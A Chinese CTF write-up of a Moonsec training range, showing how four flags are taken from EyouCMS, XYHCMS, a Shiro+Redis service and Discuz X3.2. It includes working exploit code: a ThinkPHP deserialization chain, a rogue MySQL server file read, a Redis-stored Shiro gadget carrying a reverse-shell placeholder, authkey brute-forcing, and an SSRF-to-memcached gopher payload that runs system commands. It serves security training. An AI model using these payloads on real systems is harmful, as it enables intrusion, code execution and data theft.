前言
首先感谢月师傅举办的中秋的活动,靶场做的很好而且很有趣,月师傅博客渗透测试培训-网络安全培训-暗月博客 (moonsec.com) 同时感谢月师傅送来的月饼,。
正文
首先用goby对103.108.67.223进行端口扫描(因为nmap太慢了)
FLAG1
http://103.108.67.223:8880/
网站最下面
Copyright © 2012-2018 某某公司 版权所有 Powered by EyouCms
EyouCms
扫描文件
打Nday
试了好几个漏洞
最终参考Eyoucms V1.5.X漏洞分析 - 徐野子 - 博客园 (cnblogs.com)
爆破token 用的go的 不知道为什么python爆破不出来
后台getshell 权限太小 看phpinfo 有disablefunction限制 不知道为什么蚁剑的插件不能过…
Releases · TarlogicSecurity/Chankro (github.com)
利用LDPRELOAD绕过但是没成功
最后用.antproxy.php
moonsec_flag{2f0460e434a10e8912cOef6f630add2c
FLAG2
http://103.108.67.223:8866/
Copyright © 2014-2020 XYHCMS. 行云海软件 版权所有 Power by XYHCMS
XYHCMS
目录扫描
有个Install??不知道有没有文件删除 搜索Nday
搜索到的第一个
痛失CVE之xyhcms(thinkphp3.2.3)反序列化 - FreeBuf网络安全行业门户
目录/App/Runtime/Data/config/是没有的 但是可以/App/Runtime/Data/
http://103.108.67.223:8866/App/Runtime/Data/d51694dcb61d76bef156076835ffd7e7_config/site.php
找到key:TlRAcBF8e
然后跑poc替换nikname
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112
| <?php namespace Think\Db\Driver; use PDO; class Mysql{ protected $options = array( PDO::MYSQL_ATTR_LOCAL_INFILE => true ); protected $config = array( "dsn" => "mysql:host=localhost;dbname=xyhcms;port=3306", "username" => "root", "password" => "root" ); }
namespace Think; class Model{ protected $options = array(); protected $pk; protected $data = array(); protected $db = null; public function __construct(){ $this->db = new \Think\Db\Driver\Mysql(); $this->options['where'] = ''; $this->pk = 'luoke'; $this->data[$this->pk] = array( "table" => "xyh_admin_log", "where" => "id=0" ); } }
namespace Think\Session\Driver; class Memcache{ protected $handle; public function __construct() { $this->handle = new \Think\Model(); } }
namespace Think\Image\Driver; class Imagick{ private $img; public function __construct() { $this->img = new \Think\Session\Driver\Memcache(); } }
namespace Common\Lib; class SysCrypt{
private $crypt_key; public function __construct($crypt_key) { $this -> crypt_key = $crypt_key; } public function php_encrypt($txt) { srand((double)microtime() * 1000000); $encrypt_key = md5(rand(0,32000)); $ctr = 0; $tmp = ''; for($i = 0;$i<strlen($txt);$i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]); } return base64_encode(self::__key($tmp,$this -> crypt_key)); } public function php_decrypt($txt) { $txt = self::__key(base64_decode($txt),$this -> crypt_key); $tmp = ''; for($i = 0;$i < strlen($txt); $i++) { $md5 = $txt[$i]; $tmp .= $txt[++$i] ^ $md5; } return $tmp; } private function __key($txt,$encrypt_key) { $encrypt_key = md5($encrypt_key); $ctr = 0; $tmp = ''; for($i = 0; $i < strlen($txt); $i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; } return $tmp; } public function __destruct() { $this -> crypt_key = null; } }
function get_cookie($name, $key = '') { $key = '7q6Gw97sh'; $key = md5($key); $sc = new \Common\Lib\SysCrypt($key); $value = $sc->php_decrypt($name); return unserialize($value); }
function set_cookie($args, $key = '') { $key = 'TlRAcBF8e'; $value = serialize($args); $key = md5($key); $sc = new \Common\Lib\SysCrypt($key); $value = $sc->php_encrypt($value); return $value; }
$b = new \Think\Image\Driver\Imagick(); $a = set_cookie($b,''); echo str_replace('+','%2B',$a);
|
利用文章中的poc成功执行语句
然后又发现了文章xyhcms getshell_qq_42307546的博客-CSDN博客
不过可以直接用利用Gifts/Rogue-MySql-Server: Rogue MySql Server (github.com)我们直接搞flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| import socket import asyncore import asynchat import struct import random import logging import logging.handlers
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG) tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab') tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s")) log.addHandler( tmp_format )
filelist = ( r'/flag',
)
__author__ = 'Gifts'
|
得到
moonsec_flag{f54d2bdb1f8c6a7996b0a0bf373997fd}
FLAG3
http://103.108.67.223:8089/
shrio+redis
做过类似的CTF题目
爆破redis密码拿到 abc123
之前月师傅的文章好像讲过这个问题shrio+redis
参考文章redis未授权到shiro反序列化 - 先知社区 (aliyun.com)
也可以直接参考(用cokeBeer师傅的没成功)
1 2 3 4 5 6 7 8 9 10 11
| import pyyso import socket
s=socket.socket() s.connect(("127.0.0.1",6379)) whatever=b"123" key=b"shiro:session:"+whatever value=pyyso.cb1v192("反弹shell命令") //注意要bash -c {} 同时编码↓ s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24"+str(len(key)).encode()+b"\r\n"+key+b"\r\n\x24"+str(len(value)).encode()+b"\r\n"+value+b"\r\n") if b"+OK" in s.recv(3): print("success")
|
https://mp.weixin.qq.com/s/QvyVU6HXmxlfdkLwrH9vTw (月师傅之前的考核文章也有提到)
抓包修改JESSIONID 成功反弹 读取flag(反弹不超过就多试几次,或者写入key后用shiro的打法)
moonsec_flag{327a6c4304ad5938eaf0efb6cc3e53dc}
FLAG4
http://103.108.67.223:8822/forum.php
Powered by Discuz! X3.2
打了一天多没结果 后来看到月师傅群里说都是公开的
看http://103.108.67.223:8822/install/ 目录去翻阅文件
其中http://103.108.67.223:8822/install/data/ 里面有一个数据库有
(‘authkey’,’9f50c9zryqZt5FYA’);
Authkey?? 搜索相关的
参考文章
Discuz 搜索结果 - 像黑客一样学习 (hacking8.com)
VulWiki/Web安全/Discuz/Discuz! X < 3.4 authkey 算法的安全性漏洞.md at master · Ares-X/VulWiki (github.com)
DiscuzX3.3 authkey可爆破漏洞复现 - darkless
用fofa去看了其他站点 发现sstr不同都是不一样的 Cookie 前缀是已知的 注意修改
主要参考Discuz!-X-_-3.4-authkey-算法的安全性漏洞 - Discuz (hacking8.com)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| # coding=utf-8 w_len = 10 result = "" str_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz" length = len(str_list) for i in xrange(w_len): result+=" " result+=str(length-1) result+=" " result+="0 " result+=str(length-1) result+=" " sstr = "t2xl" for i in sstr: result+=str(str_list.index(i)) result+=" " result+=str(str_list.index(i)) result+=" " result+="0 " result+=str(length-1) result+=" " print result
|
得到参数,使用php_mt_seed脚本
https://github.com/ianxtianxt/php-mt_rand
根据结果种子 然后生成随机字符串
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php function random($length) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000); for($i = 0; $i < $length; $i++) { $hash .= $chars[mt_rand(0, $max)]; } return $hash; } $fp = fopen('result.txt', 'rb'); $fp2 = fopen('result2.txt', 'wb'); while(!feof($fp)){ $b = fgets($fp, 4096); if(preg_match("/seed = (\d)+/", $b, $matach)){ $m = $matach[0]; }else{ continue; } // var_dump(substr($m,7)); mt_srand(substr($m,7)); fwrite($fp2, random(10)."\n"); } fclose($fp); fclose($fp2);
|
同时注意
生成https://www.openwall.com/php_mt_seed/参数
因为需要用来填充”result“
最后利用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| # coding=utf-8 import itertools import hashlib import time def dsign(authkey): url = "url" idstring = "vnY6nW" uid = 2 uurl = "{}member.php?mod=getpasswd&uid={}&id={}".format(url, uid, idstring) url_md5 = hashlib.md5(uurl+authkey) return url_md5.hexdigest()[:16] def main(): sign = "af3b937d0132a06b" str_list = "0123456789abcdef" with open('result2.txt') as f: ranlist = [s[:-1] for s in f] s_list = sorted(set(ranlist), key=ranlist.index) r_list = itertools.product(str_list, repeat=6) print "[!] start running...." s_time = time.time() for j in r_list: for s in s_list: prefix = "".join(j) authkey = prefix + s # print dsign(authkey) if dsign(authkey) == sign: print "[*] found used time: " + str(time.time() - s_time) return "[*] authkey found: " + authkey
|
后来发现http://103.108.67.223:8822/config/config_global.php.bak
有信息泄露!??
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| // -------------------------- CONFIG MEMORY --------------------------- // $_config['memory']['prefix'] = 'Wzj0Ps_'; $_config['memory']['redis']['server'] = ''; $_config['memory']['redis']['port'] = 6379; $_config['memory']['redis']['pconnect'] = 1; $_config['memory']['redis']['timeout'] = '0'; $_config['memory']['redis']['requirepass'] = ''; $_config['memory']['redis']['serializer'] = 1; $_config['memory']['memcache']['server'] = '127.0.0.1'; $_config['memory']['memcache']['port'] = 11211; $_config['memory']['memcache']['pconnect'] = 1; $_config['memory']['memcache']['timeout'] = 1; $_config['memory']['apc'] = 1; $_config['memory']['xcache'] = 1; $_config['memory']['eaccelerator'] = 1; $_config['memory']['wincache'] = 1;
|
同时查找几篇文章
Discuz!-X-authkeyMemcachessrf-getshell - Discuz (hacking8.com)
Discuz!-X3.4-Memcached未授权访问导致的rce - Discuz (hacking8.com)
poc:
1
| http://103.148.244.120:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://www.oosec.cn/poc.php?a.jpg[/img]
|
把这段payload放在服务器去请求
1 2 3
| <?php header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20162%0d%0aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A9%3A%22cat%20/flag%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D"); ?>
|
第一次为解析,没注意到文章中
1
| $payload['output']['preg']['search']['plugins']= "/.*/e";
|
/.*/e
最后用
1 2 3
| <?php header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20173%0D%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A19%3A%22system('cat%20%2Fflag')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D"); ?>
|
拿到flag moonsec_flag{ae5cbc768cb85f87e83e8fe75fbcd1eb}